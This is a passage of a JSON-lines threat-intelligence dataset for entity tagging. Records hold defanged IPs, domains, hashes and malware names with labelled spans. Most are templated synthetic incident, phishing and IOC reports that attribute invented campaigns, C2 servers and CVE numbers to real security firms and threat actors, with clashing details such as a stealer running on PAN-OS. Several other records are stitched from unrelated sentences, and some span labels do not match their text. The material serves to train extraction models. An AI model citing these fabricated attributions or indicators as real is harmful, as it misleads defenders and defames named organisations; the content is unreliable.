Python FLASK stuff ####\n\n \n'data': b'{ \n  \"attachments\": [ \n   {\n\n    \"fallback\": \"[122] test / test.\",\n\n    \"color\": \"#aa2222\",\n\n    \"title\": \"[122] test\",\n\n    \"text\": \"test\",\n\n    \"fields\": [   \n     {    \n\n      \"title\": \"Alert Severity\",\n    \n      \"value\": \"CRITICAL\",\n    \n      \"short\": false  \n     },  {   \n      \"title\": \"Appliance\",     \n      \"value\": \"quantastor (https://)\",\n     \n      \"short\": true  \n\n     },  {    \n\n      \"title\": \"System / 
Driver / Kernel Ver\",    \n\n      \"value\": \"5 [ . ] 10 [ . ] 0 [ . ] 156+a25eaacef / scst-3.5.0-pre / 5.3.0-62-generic\",    \n\n      \"short\": false  \n\n     },  {    \n\n      \"title\": \"System Startup\",    \n\n      \"value\": \"Fri Aug  6 16-02-55 2021\",    \n\n      \"short\": true  \n\n      },  {    \n\n      \"title\": \"SSID\",    \n\n      \"value\": \"f4823762-1dd1-1333-47a0-6238c474a7e7\",    \n\n      \"short\": true  \n\n     },\n    ],\n\n    \"footer\": \"QuantaStor Call-home Alert\",\n\n    \"footer_icon\": \" hxxps://platform[ . ]slack-edge[ . ]com/img/default_application_icon.png \",\n\n    \"ts\": 1628461774\n   }\n  ], \n  \"mrkdwn\":true \n }', \n #### FLASK REQUEST STUFF #####\n\n 'headers': {\n\n  'Host': '', \n  'User-Agent': 'curl/7.58.0', \n  'Accept': '*/*', \n  'Content-Type': 'application/json', \n  'Content-Length': '790'\n\n }, \n 'args': ImmutableMultiDict([]), \n 'form': ImmutableMultiDict([]), \n 'remote_addr': '217 [ . ] 103 [ . ] 63 [ . ] 173', \n 'path': '/payload/58', \n 'whois_ip': 'TNF-AS, NL'\n}\n\n#### END FLASK REQUEST STUFF #####", "spans": {"Indicator: 5.10.0.156": [[2114, 2142]], "Indicator: 217.103.63.173": [[2972, 3004]], "Indicator: https://platform.slack-edge.com/img/default_application_icon.png": [[2559, 2631]], "System: Windows": [[758, 765], [1198, 1205]], "System: Safari": [[847, 853], [1287, 1293]], "System: Python": [[1475, 1481], [1592, 1598]], "System: curl": [[2781, 2785]], "Organization: Mozilla": [[745, 752], [1185, 1192]], "Vulnerability: SSRF": [[86, 90], [165, 169]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-42079"}} {"text": "A backdoor also known as: W32.CpqEasyBttn.Worm Dropped:Win32.Worm.VB.NRV Email-Worm.Win32.VB!O Worm.Flewon.S349523 Win32.Worm.VB.ji Hacktool.Spammer Win32/Flewon.E WORM_VB.DHQ Win.Worm.Liamo-1 Dropped:Win32.Worm.VB.NRV Email-Worm.Win32.VB.cb Dropped:Win32.Worm.VB.NRV Trojan.Win32.VB.hpnv W32.W.AutoRun.l6mI Win32.Worm-email.Vb.Wqda 
Dropped:Win32.Worm.VB.NRV Dropped:Win32.Worm.VB.NRV Trojan.PWS.Asterie Worm.VB.Win32.303 WORM_VB.DHQ BehavesLike[ . ]Win32[ . ]VBObfus[ . ]ch TrojanClicker.Qihai.aq TR/Spy[.]Vwealer[.]KZ.33 Worm[Email]/Win32.VB Win32.Worm.VB.NRV I-Worm.Win32.VB.94208.E Email-Worm.Win32.VB.cb Worm:Win32/Flewon.A HEUR/Fakon.mwf Dropped:Win32.Worm.VB.NRV Trojan.VBRA.010583 Win32/VB.NGN I-Worm.VB.XYH Email-Worm.Win32.VB.cb W32/VB.CB@mm W32/MadCoffee.B.worm Win32/Trojan.Spy.bc3", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.VBObfus.ch": [[434, 474]], "Indicator: Spy.Vwealer.KZ": [[501, 519]]}, "info": {"id": "cyner2_train_001950", "source": "defanged_augment"}} {"text": "Incident Response Summary: On detection of anomalous traffic to 10[.]11[.]117[.]233, the CrowdStrike IR team identified Raccoon Stealer running as C:\\ProgramData\\csrss.exe. The threat actor, believed to be Flax Typhoon, used Mythic for credential harvesting and BITSAdmin for lateral movement. Exfiltrated data was sent to cdn-portal[ . ]cc and staticsync[.]org. The initial dropper (SHA256: 942d91adb7bc1b10862d51ae3df475aa8c3c63f675e37c923c86df92e17b677d) was delivered via a phishing email from account@identity-verify[ . ]cc. A second C2 node was observed at 172 [ . ] 101 [ . ] 134 [ . ] 180, with a persistence mechanism writing to C:\\Users\\admin\\Downloads\\shell.php.", "spans": {"Indicator: 10.11.117.233": [[64, 83]], "Organization: CrowdStrike": [[89, 100]], "Malware: Raccoon Stealer": [[120, 135]], "Indicator: cdn-portal.cc": [[323, 340]], "Indicator: staticsync.org": [[345, 361]], "Indicator: 942d91adb7bc1b10862d51ae3df475aa8c3c63f675e37c923c86df92e17b677d": [[392, 456]], "Indicator: account@identity-verify.cc": [[498, 528]], "Indicator: 172.101.134.180": [[563, 596]]}, "info": {"id": "synth_v2_00262", "source": "defanged_augment"}} {"text": "Incident Response Summary: On detection of anomalous traffic to 10 [ . ] 104 [ . ] 97 [ . 
] 243, the ESET Research IR team identified ShadowPad running as C:\\Program Files\\Common Files\\payload.bin. The threat actor, believed to be Flax Typhoon, used PowerView for credential harvesting and PowerShell Empire for lateral movement. Exfiltrated data was sent to cloudstatic[ . ]xyz and cloudgateway[.]org. The initial dropper (MD5: 16691c4ed662f3cc59250951902b17bb) was delivered via a phishing email from report@credential-check[ . ]site. A second C2 node was observed at 74 [ . ] 253 [ . ] 195 [ . ] 34, with a persistence mechanism writing to C:\\Windows\\Temp\\agent.py.", "spans": {"Indicator: 10.104.97.243": [[64, 95]], "Organization: ESET Research": [[101, 114]], "Malware: ShadowPad": [[134, 143]], "Indicator: cloudstatic.xyz": [[359, 378]], "Indicator: cloudgateway.org": [[383, 401]], "Indicator: 16691c4ed662f3cc59250951902b17bb": [[429, 461]], "Indicator: report@credential-check.site": [[503, 535]], "Indicator: 74.253.195.34": [[570, 601]]}, "info": {"id": "synth_v2_00263", "source": "defanged_augment"}} {"text": "### Impact In a CSRF attack, an innocent end user is tricked by an attacker into submitting a web request that they did not intend. This may cause actions to be performed on the website that can include inadvertent client or server data leakage, change of session state, or manipulation of an end user's account. ### Patch Upgrade to v2022.09.10 to patch this vulnerability. ### Workarounds Rebuild and redeploy the Orchest `auth-server` with this commit: hxxps://github[.]com/orchest/orchest/commit/c2587a963cca742c4a2503bce4cfb4161bf64c2d ### References hxxps://en[.]wikipedia[.]org/wiki/Cross-site_request_forgery hxxps://cwe[ . ]mitre[ . ]org/data/definitions/352.html ### For more information If you have any questions or comments about this advisory: * Open an issue in hxxps://github[ . 
]com/orchest/orchest * Email us at rick@orchest[.]io", "spans": {"Indicator: https://github.com/orchest/orchest/commit/c2587a963cca742c4a2503bce4cfb4161bf64c2d": [[456, 540]], "Indicator: https://en.wikipedia.org/wiki/Cross-site_request_forgery": [[556, 616]], "Indicator: https://cwe.mitre.org/data/definitions/352.html": [[617, 672]], "Indicator: https://github.com/orchest/orchest": [[776, 814]], "Indicator: orchest.io": [[834, 846]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2022-39268"}} {"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Rubeus artifacts at /opt/app/bin/winlogon.exe. Memory dump analysis confirmed execution of BITSAdmin. Registry modifications pointed to persistence via /home/user/.config/dropper.ps1. Network forensics identified connections to 192[.]72[.]32[.]219 and portalupdate[ . ]info. Email headers traced the initial vector to helpdesk@credential-check[.]site. File C:\\Users\\admin\\Downloads\\shell.php (SHA1: 5e2b78f682cab0d52d50c7e8c8fdbe2177990631) was identified as the initial dropper. A staging URL hxxps://proxy-edge[ . ]dev/admin/config resolved to 121 [ . ] 130 [ . ] 143 [ . ] 115. 
Secondary artifact hash: MD5: 248b6f59e35839343c2a2dd073fe69ee.", "spans": {"Indicator: 192.72.32.219": [[300, 319]], "Indicator: portalupdate.info": [[324, 345]], "Indicator: helpdesk@credential-check.site": [[390, 422]], "Indicator: 5e2b78f682cab0d52d50c7e8c8fdbe2177990631": [[471, 511]], "Indicator: https://proxy-edge.dev/admin/config": [[566, 605]], "Indicator: 121.130.143.115": [[618, 651]], "Indicator: 248b6f59e35839343c2a2dd073fe69ee": [[683, 715]]}, "info": {"id": "synth_v2_01280", "source": "defanged_augment"}} {"text": "A backdoor also known as: VB:Trojan.VBA.Downloader.R VB:Trojan.VBA.Downloader.R VBA[.]Trojan[.]Obfuscated[.]at VBA/Obfuscated.P Doc.Macro.Obfuscation-6360615-0 VB:Trojan.VBA.Downloader.R VB:Trojan.VBA.Downloader.R Trojan.Script.MLW.ehjqnz VB:Trojan.VBA.Downloader.R VB:Trojan.VBA.Downloader.R W97M/Downloader.bkw HEUR.VBA.Trojan.e TrojanDownloader:O97M/Shelmock.A!dha W97M/Downloader.bkw Trojan.VBA.Obfuscated heur.macro.powershell.x", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: VBA.Trojan.Obfuscated.at": [[80, 110]]}, "info": {"id": "cyner2_train_003455", "source": "defanged_augment"}} {"text": "IOC Bulletin - BlackCat Campaign:\nNetwork Indicators:\n- 172 [ . ] 214 [ . ] 65 [ . ] 81\n- 127[.]24[.]16[.]145\n- 133[.]26[.]156[.]4\n- backup-portal[ . ]net\n- staticrelay[ . ]link\nURLs:\n- hxxps://update-api[.]dev/login\n- hxxps://cloudnode[ . ]io/portal/verify\nEmail Senders:\n- service@credential-check[ . 
]site\n- helpdesk@mail-service[.]info\nFile Indicators:\n- SHA1: 3154292e94d84d66d2ac9363f8ad862292f78b17\n- SHA256: c651925518198642a56e46608a9e6a8c6884c5b4d81c8f30f9989019bb06c65a\n- Drop path: /dev/shm/agent.py", "spans": {"Malware: BlackCat": [[15, 23]], "Indicator: 172.214.65.81": [[56, 87]], "Indicator: 127.24.16.145": [[90, 109]], "Indicator: 133.26.156.4": [[112, 130]], "Indicator: backup-portal.net": [[133, 154]], "Indicator: staticrelay.link": [[157, 177]], "Indicator: hxxps://update-api.dev/login": [[186, 216]], "Indicator: https://cloudnode.io/portal/verify": [[219, 257]], "Indicator: service@credential-check.site": [[275, 308]], "Indicator: helpdesk@mail-service.info": [[311, 339]], "Indicator: 3154292e94d84d66d2ac9363f8ad862292f78b17": [[365, 405]], "Indicator: c651925518198642a56e46608a9e6a8c6884c5b4d81c8f30f9989019bb06c65a": [[416, 480]]}, "info": {"id": "synth_v2_01473", "source": "defanged_augment"}} {"text": "FireEye published a threat intelligence report linking UNC2452 to a new campaign exploiting CVE-2024-14337 in F5 BIG-IP. The attackers deployed WarmCookie via Burp Suite, establishing C2 communication with 10 [ . ] 226 [ . ] 157 [ . ] 94 and node-login[.]tech. A secondary payload was downloaded from hxxp://proxyedge[ . ]com/gate.php. The malware binary (MD5: 478c274e5643a15a0a4a5b0338f93f89) was dropped to C:\\Windows\\Temp\\ntds.dit. Phishing emails were sent from finance@document-share[ . ]link targeting enterprise users. A backup C2 server was identified at 67 [ . ] 79 [ . ] 155 [ . 
] 3.", "spans": {"Organization: FireEye": [[0, 7]], "Vulnerability: CVE-2024-14337": [[92, 106]], "System: F5 BIG-IP": [[110, 119]], "Malware: WarmCookie": [[144, 154]], "Indicator: 10.226.157.94": [[206, 237]], "Indicator: node-login.tech": [[242, 259]], "Indicator: http://proxyedge.com/gate.php": [[301, 334]], "Indicator: 478c274e5643a15a0a4a5b0338f93f89": [[361, 393]], "Indicator: finance@document-share.link": [[467, 498]], "Indicator: 67.79.155.3": [[564, 593]]}, "info": {"id": "synth_v2_00174", "source": "defanged_augment"}} {"text": "### Impact It's possible to know if a user has or not an account in a wiki related to an email address, and which username(s) is actually tied to that email by forging a request to the Forgot username page. Note that since this page does not have a CSRF check it's quite easy to perform a lot of those requests. ### Patches This issue has been patched in XWiki 12.10.5 and 13.2RC1. Two different patches are provided: - a first one to fix the CSRF problem - a more complex one that now relies on sending an email for the Forgot username process. ### Workarounds It's possible to fix the problem without uprading by editing the ForgotUsername page in version below 13.x, to use the following code: hxxps://github[.]com/xwiki/xwiki-platform/blob/69548c0320cbd772540cf4668743e69f879812cf/xwiki-platform-core/xwiki-platform-administration/xwiki-platform-administration-ui/src/main/resources/XWiki/ForgotUsername.xml#L39-L123 In version after 13.x it's also possible to edit manually the forgotusername.vm file, but it's really encouraged to upgrade the version here. ### References * hxxps://jira[ . ]xwiki[ . ]org/browse/XWIKI-18384 * hxxps://jira[.]xwiki[.]org/browse/XWIKI-18408 ### For more information If you have any questions or comments about this advisory: * Open an issue in [Jira XWiki](hxxps://jira[.]xwiki[.]org) * Email us at [security ML](mailto:security@xwiki[ . 
]org)", "spans": {"Indicator: https://github.com/xwiki/xwiki-platform/blob/69548c0320cbd772540cf4668743e69f879812cf/xwiki-platform-core/xwiki-platform-administration/xwiki-platform-administration-ui/src/main/resources/XWiki/ForgotUsername.xml#L39-L123": [[697, 920]], "Indicator: https://jira.xwiki.org/browse/XWIKI-18384": [[1080, 1129]], "Indicator: https://jira.xwiki.org/browse/XWIKI-18408": [[1132, 1177]], "Indicator: https://jira.xwiki.org": [[1294, 1320]], "Indicator: xwiki.org": [[1366, 1379]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-32732"}} {"text": "Blog Post by Mandiant: Tracking Granite Typhoon's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2023-14679 against Microsoft Exchange deployments. The initial access vector involves spear-phishing emails from finance@auth-check[.]org delivering Ryuk. Post-compromise, the attackers deploy Vidar and use Merlin for reconnaissance. C2 infrastructure includes 192[.]126[.]68[.]155 and relaysync[.]info. A staging server at hxxp://datadata[ . ]link/collect hosts additional tooling. 
Key artifact: C:\\Windows\\Tasks\\loader.exe (SHA1: f69f98fb65d36fd0522ccb3423b014eadd93443f).", "spans": {"Organization: Mandiant": [[13, 21]], "Vulnerability: CVE-2023-14679": [[127, 141]], "System: Microsoft Exchange": [[150, 168]], "Indicator: finance@auth-check.org": [[244, 268]], "Malware: Ryuk": [[280, 284]], "Malware: Vidar": [[324, 329]], "Indicator: 192.126.68.155": [[392, 412]], "Indicator: relaysync.info": [[417, 433]], "Indicator: hxxp://datadata.link/collect": [[455, 487]], "Indicator: f69f98fb65d36fd0522ccb3423b014eadd93443f": [[563, 603]]}, "info": {"id": "synth_v2_01674", "source": "defanged_augment"}} {"text": "Artifact Analysis for Raccoon Stealer campaign:\nStage 1 dropper at C:\\ProgramData\\taskhost.exe - SHA1: ca7ec44d095c278af6a7e0b7477646b11e9615c1\nStage 2 loader at C:\\Program Files\\Common Files\\update.dll - SHA1: 31fbfbb95f62a932f33026643c437dfd749707c8\nFinal payload at C:\\Users\\Public\\Documents\\csrss.exe - MD5: 38ff55b0a92b142e09a2625a1e16ec2b\nExfiltration module - SHA256: 3e40493656bbbde19c267eae64df54a2c754c835945f7ac23d224bb1c7f163c7\nAll stages communicated with 61[.]189[.]94[.]238. Havoc signatures detected in Stage 2.", "spans": {"Malware: Raccoon Stealer": [[22, 37]], "Indicator: ca7ec44d095c278af6a7e0b7477646b11e9615c1": [[103, 143]], "Indicator: 31fbfbb95f62a932f33026643c437dfd749707c8": [[211, 251]], "Indicator: 38ff55b0a92b142e09a2625a1e16ec2b": [[312, 344]], "Indicator: 3e40493656bbbde19c267eae64df54a2c754c835945f7ac23d224bb1c7f163c7": [[375, 439]], "Indicator: 61.189.94.238": [[469, 488]]}, "info": {"id": "synth_v2_01951", "source": "defanged_augment"}} {"text": "This addition is seen in Figure 5 . About four months after The New York Times publicized an attack on its network , the APT12 behind the intrusion deployed updated versions of their Backdoor.APT.Aumlib and Backdoor.APT.Ixeshe malware families . The controller will respond with one of two responses: 99 [ . ] 250 [ . ] 250 [ . 
] 199 will set the receive mode to . Another new actor we discovered , seemingly of Vietnamese origin , uses a Yashma ransomware variant to target victims in Bulgaria , China , Vietnam and other countries .", "spans": {"Organization: The New York Times": [[60, 78]], "Indicator: 99.250.250.199": [[301, 333]], "Organization: Bulgaria": [[486, 494]], "Organization: China": [[497, 502]], "Organization: Vietnam": [[505, 512]]}, "info": {"id": "cyberner_stix_train_002047", "source": "defanged_augment"}} {"text": "Incident Response Summary: On detection of anomalous traffic to 192[.]82[.]174[.]115, the Microsoft MSRC IR team identified Play running as C:\\Windows\\System32\\shell.php. The threat actor, believed to be Silk Typhoon, used SharpHound for credential harvesting and GhostPack for lateral movement. Exfiltrated data was sent to cdnportal[.]xyz and static-static[ . ]net. The initial dropper (SHA256: 97260feeb3c713d65f0787c7ace21b46423d5132f4325c0999a9968e2a4f9f2c) was delivered via a phishing email from finance@urgent-notice[ . ]online. A second C2 node was observed at 172 [ . ] 148 [ . ] 184 [ . ] 160, with a persistence mechanism writing to /dev/shm/taskhost.exe.", "spans": {"Indicator: 192.82.174.115": [[64, 84]], "Organization: Microsoft MSRC": [[90, 104]], "Malware: Play": [[124, 128]], "Indicator: cdnportal.xyz": [[325, 340]], "Indicator: static-static.net": [[345, 366]], "Indicator: 97260feeb3c713d65f0787c7ace21b46423d5132f4325c0999a9968e2a4f9f2c": [[397, 461]], "Indicator: finance@urgent-notice.online": [[503, 535]], "Indicator: 172.148.184.160": [[570, 603]]}, "info": {"id": "synth_v2_00370", "source": "defanged_augment"}} {"text": "Phishing Campaign Report: Proofpoint identified a large-scale phishing operation. Emails originated from service@phishing-domain[ . ]com and verify@account-update[.]xyz, spoofing legitimate services. Victims were directed to hxxp://auth-sync[.]io/gate.php which hosted a credential harvesting page on auth-login[.]net. 
A secondary link hxxps://edge-login[.]site/collect delivered Gootloader (SHA256: 903cc5c2686e430681a8ddd1a0a178423db0bd5c00c5358e603e45e389f42927). The malware was saved to /home/user/.config/sam.hive and established C2 with 48[.]165[.]142[.]215.", "spans": {"Organization: Proofpoint": [[26, 36]], "Indicator: service@phishing-domain.com": [[105, 136]], "Indicator: verify@account-update.xyz": [[141, 168]], "Indicator: http://auth-sync.io/gate.php": [[225, 255]], "Indicator: auth-login.net": [[301, 317]], "Indicator: https://edge-login.site/collect": [[336, 369]], "Malware: Gootloader": [[380, 390]], "Indicator: 903cc5c2686e430681a8ddd1a0a178423db0bd5c00c5358e603e45e389f42927": [[400, 464]], "Indicator: 48.165.142.215": [[544, 564]]}, "info": {"id": "synth_v2_01047", "source": "defanged_augment"}} {"text": "Throughout the final quarter of 2016 and first month of 2017 , FireEye Dynamic Threat Intelligence (DTI) observed consistent Magnitude EK hits from several customers , the majority of whom reside in the APAC region . Per the complaint , the email account watsonhenny@gmail[ . ]com was used to send LinkedIn invitations to employees of a bank later targeted by APT38 .", "spans": {"Organization: FireEye": [[63, 70]], "Indicator: watsonhenny@gmail.com": [[255, 280]], "Organization: employees": [[322, 331]]}, "info": {"id": "cyberner_stix_train_002450", "source": "defanged_augment"}} {"text": "IOC Bulletin - Vidar Campaign:\nNetwork Indicators:\n- 139 [ . ] 180 [ . ] 225 [ . ] 146\n- 131[.]207[.]99[.]162\n- 10[.]130[.]28[.]115\n- backup-backup[ . ]io\n- data-edge[.]top\nURLs:\n- hxxps://auth-auth[.]link/secure/token\n- hxxp://proxyportal[ . ]online/callback\nEmail Senders:\n- info@document-share[ . 
]link\n- ceo@account-update[.]xyz\nFile Indicators:\n- SHA1: 9ac06ce6d73407ad1bf6bc321fe5998e13a076ac\n- SHA256: e667d610d13e603d571e1bdb31395c30fbd308a95dce909716b1f31555881036\n- Drop path: /usr/local/bin/shell.php", "spans": {"Malware: Vidar": [[15, 20]], "Indicator: 139.180.225.146": [[53, 86]], "Indicator: 131.207.99.162": [[89, 109]], "Indicator: 10.130.28.115": [[112, 131]], "Indicator: backup-backup.io": [[134, 154]], "Indicator: data-edge.top": [[157, 172]], "Indicator: https://auth-auth.link/secure/token": [[181, 218]], "Indicator: http://proxyportal.online/callback": [[221, 259]], "Indicator: info@document-share.link": [[277, 305]], "Indicator: ceo@account-update.xyz": [[308, 332]], "Indicator: 9ac06ce6d73407ad1bf6bc321fe5998e13a076ac": [[358, 398]], "Indicator: e667d610d13e603d571e1bdb31395c30fbd308a95dce909716b1f31555881036": [[409, 473]]}, "info": {"id": "synth_v2_01442", "source": "defanged_augment"}} {"text": "SentinelOne published a threat intelligence report linking Forest Blizzard to a new campaign exploiting CVE-2021-20463 in Apache Struts. The attackers deployed Latrodectus via Covenant, establishing C2 communication with 10[.]221[.]201[.]161 and edgecloud[ . ]top. A secondary payload was downloaded from hxxp://proxy-login[.]xyz/secure/token. The malware binary (MD5: 18d0f61c949507c7592eba9db7da3e11) was dropped to C:\\Windows\\System32\\agent.py. Phishing emails were sent from noreply@account-update[ . ]xyz targeting enterprise users. 
A backup C2 server was identified at 183[.]195[.]207[.]98.", "spans": {"Organization: SentinelOne": [[0, 11]], "Vulnerability: CVE-2021-20463": [[104, 118]], "System: Apache Struts": [[122, 135]], "Malware: Latrodectus": [[160, 171]], "Indicator: 10.221.201.161": [[221, 241]], "Indicator: edgecloud.top": [[246, 263]], "Indicator: http://proxy-login.xyz/secure/token": [[305, 342]], "Indicator: 18d0f61c949507c7592eba9db7da3e11": [[369, 401]], "Indicator: noreply@account-update.xyz": [[479, 509]], "Indicator: 183.195.207.98": [[575, 595]]}, "info": {"id": "synth_v2_00211", "source": "defanged_augment"}} {"text": "On September 10 , 2019 , we observed an HTTP POST request to the following URL that we believe was the exploitation of CVE-2019-0604 in a publicly facing SharePoint server ( T1190 ) : /_layouts/15/picker[ . ]aspx .", "spans": {"Vulnerability: CVE-2019-0604": [[119, 132]], "Indicator: /_layouts/15/picker.aspx": [[184, 212]]}, "info": {"id": "cyberner_stix_train_000542", "source": "defanged_augment"}} {"text": "Phishing Campaign Report: Proofpoint identified a large-scale phishing operation. Emails originated from alert@account-update[.]xyz and security@account-update[.]xyz, spoofing legitimate services. Victims were directed to hxxp://portalsync[ . ]xyz/panel/index.html which hosted a credential harvesting page on login-auth[ . ]site. A secondary link hxxps://securesecure[ . ]com/portal/verify delivered DarkSide (SHA1: d649b48289f9a688ba84181428b87cb603e348ac). The malware was saved to /opt/app/bin/backdoor.elf and established C2 with 218 [ . ] 98 [ . ] 99 [ . 
] 190.", "spans": {"Organization: Proofpoint": [[26, 36]], "Indicator: alert@account-update.xyz": [[105, 131]], "Indicator: security@account-update.xyz": [[136, 165]], "Indicator: hxxp://portalsync.xyz/panel/index.html": [[222, 264]], "Indicator: login-auth.site": [[310, 329]], "Indicator: https://securesecure.com/portal/verify": [[348, 390]], "Malware: DarkSide": [[401, 409]], "Indicator: d649b48289f9a688ba84181428b87cb603e348ac": [[417, 457]], "Indicator: 218.98.99.190": [[535, 566]]}, "info": {"id": "synth_v2_00862", "source": "defanged_augment"}} {"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nksmbd: fix recursive locking in RPC handle list access\n\nSince commit 305853cce3794 (\"ksmbd: Fix race condition in RPC handle list\naccess\"), ksmbd_session_rpc_method() attempts to lock sess->rpc_lock.\n\nThis causes hung connections / tasks when a client attempts to open\na named pipe. Using Samba's rpcclient tool:\n\n $ rpcclient //192[.]168[.]1[.]254 -U user%password\n $ rpcclient $> srvinfo\n \n\nKernel side:\n \"echo 0 > /proc/sys/kernel/hung_task_timeout_secs\" disables this message.\n task:kworker/0:0 state:D stack:0 pid:5021 tgid:5021 ppid:2 flags:0x00200000\n Workqueue: ksmbd-io handle_ksmbd_work\n Call trace:\n __schedule from schedule+0x3c/0x58\n schedule from schedule_preempt_disabled+0xc/0x10\n schedule_preempt_disabled from rwsem_down_read_slowpath+0x1b0/0x1d8\n rwsem_down_read_slowpath from down_read+0x28/0x30\n down_read from ksmbd_session_rpc_method+0x18/0x3c\n ksmbd_session_rpc_method from ksmbd_rpc_open+0x34/0x68\n ksmbd_rpc_open from ksmbd_session_rpc_open+0x194/0x228\n ksmbd_session_rpc_open from create_smb2_pipe+0x8c/0x2c8\n create_smb2_pipe from smb2_open+0x10c/0x27ac\n smb2_open from handle_ksmbd_work+0x238/0x3dc\n handle_ksmbd_work from process_scheduled_works+0x160/0x25c\n process_scheduled_works from worker_thread+0x16c/0x1e8\n worker_thread from kthread+0xa8/0xb8\n kthread from ret_from_fork+0x14/0x38\n 
Exception stack(0x8529ffb0 to 0x8529fff8)\n\nThe task deadlocks because the lock is already held:\n ksmbd_session_rpc_open\n down_write(&sess->rpc_lock)\n ksmbd_rpc_open\n ksmbd_session_rpc_method\n down_read(&sess->rpc_lock) <-- deadlock\n\nAdjust ksmbd_session_rpc_method() callers to take the lock when necessary.", "spans": {"Indicator: 192.168.1.254": [[398, 417]], "System: Linux kernel": [[7, 19]], "System: Samba": [[358, 363]], "Vulnerability: race condition": [[165, 179]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2025-40090"}} {"text": "The server can use this information to determine if the user ’ s carrier is one of Bread ’ s targets . We identified an overlap in the domain voguextra[ . ]com , which was used by Bahamut within their \" Devoted To Humanity \" app to host an image file and as C2 server by the PrayTime iOS app mentioned in our first post . The last type of Kernel modification that ZxShell rootkit performs is the system call dispatcher ( KiFastCallEntry ) hook . Talos researchers recently discovered multiple vulnerabilities in Open Babel , an open - source software library used in a variety of chemistry and research settings .", "spans": {"Malware: Bread": [[83, 88]], "Malware: Devoted To Humanity": [[203, 222]], "Malware: ZxShell": [[364, 371]], "Organization: Talos researchers": [[446, 463]], "Indicator: voguextra.com": [[142, 159]]}, "info": {"id": "cyberner_stix_train_003586", "source": "defanged_augment"}} {"text": "Malware Analysis Report: Lumma Stealer (SHA1: 13d9cdb3c3670447ac0adad94ca51470a0f2cc51). Upon execution on Palo Alto PAN-OS, the sample creates /usr/local/bin/chrome_helper.exe and injects into legitimate processes. Network analysis shows beaconing to 172[.]240[.]9[.]81 every 60 seconds and DNS queries to portal-login[.]cc. The second stage was fetched from hxxp://apinode[ . ]online/collect and written to C:\\Windows\\Tasks\\lsass.dmp. The payload uses Seatbelt-style techniques for defense evasion. 
A secondary hash (SHA256: 144dd456de640cccfbd601e4daac55f64794a1d9d8370cc840e6135e724ec1ad) was extracted from the unpacked payload.", "spans": {"Malware: Lumma Stealer": [[25, 38]], "Indicator: 13d9cdb3c3670447ac0adad94ca51470a0f2cc51": [[46, 86]], "System: Palo Alto PAN-OS": [[107, 123]], "Indicator: 172.240.9.81": [[252, 270]], "Indicator: portal-login.cc": [[307, 324]], "Indicator: http://apinode.online/collect": [[360, 393]], "Indicator: 144dd456de640cccfbd601e4daac55f64794a1d9d8370cc840e6135e724ec1ad": [[527, 591]]}, "info": {"id": "synth_v2_00556", "source": "defanged_augment"}} {"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Mimikatz artifacts at /opt/app/bin/implant.so. Memory dump analysis confirmed execution of Impacket. Registry modifications pointed to persistence via /var/tmp/backdoor.elf. Network forensics identified connections to 191[.]74[.]48[.]21 and authnode[.]xyz. Email headers traced the initial vector to confirm@secure-verify[.]net. File C:\\ProgramData\\update.dll (MD5: a51ce9d7bfc3d1a998e514ed328dea07) was identified as the initial dropper. A staging URL hxxps://cacheportal[.]top/gate.php resolved to 44 [ . ] 65 [ . ] 80 [ . ] 72. Secondary artifact hash: SHA256: 74255276c5eeb7477976357672b8b3c4ac77008e32f6d624d0521836445f1d2d.", "spans": {"Indicator: 191.74.48.21": [[290, 308]], "Indicator: authnode.xyz": [[313, 327]], "Indicator: confirm@secure-verify.net": [[372, 399]], "Indicator: a51ce9d7bfc3d1a998e514ed328dea07": [[438, 470]], "Indicator: hxxps://cacheportal.top/gate.php": [[525, 559]], "Indicator: 44.65.80.72": [[572, 601]], "Indicator: 74255276c5eeb7477976357672b8b3c4ac77008e32f6d624d0521836445f1d2d": [[636, 700]]}, "info": {"id": "synth_v2_01126", "source": "defanged_augment"}} {"text": "X-Force IRIS researchers further identified that the threat actor behind the malicious documents served many of them using a URL-shortening scheme in the following pattern : briefl[ . 
]ink/{a-z0-9}[5] .", "spans": {"Organization: X-Force IRIS": [[0, 12]], "Indicator: briefl.ink/{a-z0-9}[5]": [[174, 200]]}, "info": {"id": "cyberner_stix_train_000108", "source": "defanged_augment"}} {"text": "Artifact Analysis for RedLine Stealer campaign:\nStage 1 dropper at C:\\Windows\\Temp\\beacon.dll - MD5: 6ec35a241998edbf93b4f18a72c51d17\nStage 2 loader at C:\\Users\\Public\\Documents\\payload.bin - MD5: a24bb5e83fc2c43a1adf388aae6a78f9\nFinal payload at C:\\ProgramData\\config.dat - SHA1: 9103179775827a21f6140add595dda10102f025e\nExfiltration module - SHA256: 0233acfd7efef6e7a997c9a15a4f8eac56edd66f6e11a6ed23361b23e090d4fe\nAll stages communicated with 154 [ . ] 39 [ . ] 25 [ . ] 38. PowerShell Empire signatures detected in Stage 2.", "spans": {"Malware: RedLine Stealer": [[22, 37]], "Indicator: 6ec35a241998edbf93b4f18a72c51d17": [[101, 133]], "Indicator: a24bb5e83fc2c43a1adf388aae6a78f9": [[197, 229]], "Indicator: 9103179775827a21f6140add595dda10102f025e": [[281, 321]], "Indicator: 0233acfd7efef6e7a997c9a15a4f8eac56edd66f6e11a6ed23361b23e090d4fe": [[352, 416]], "Indicator: 154.39.25.38": [[446, 476]]}, "info": {"id": "synth_v2_01938", "source": "defanged_augment"}} {"text": "Phishing Campaign Report: SentinelOne identified a large-scale phishing operation. Emails originated from admin@auth-check[.]org and security@secure-verify[ . ]net, spoofing legitimate services. Victims were directed to hxxp://secure-portal[.]org/login which hosted a credential harvesting page on sync-edge[.]live. A secondary link hxxps://portalbackup[.]io/login delivered SmokeLoader (SHA1: 3b4cb32a398300a5a06cd313ad99a8a29a43e65a). The malware was saved to C:\\Users\\Public\\Documents\\helper.sh and established C2 with 192 [ . ] 97 [ . ] 21 [ . 
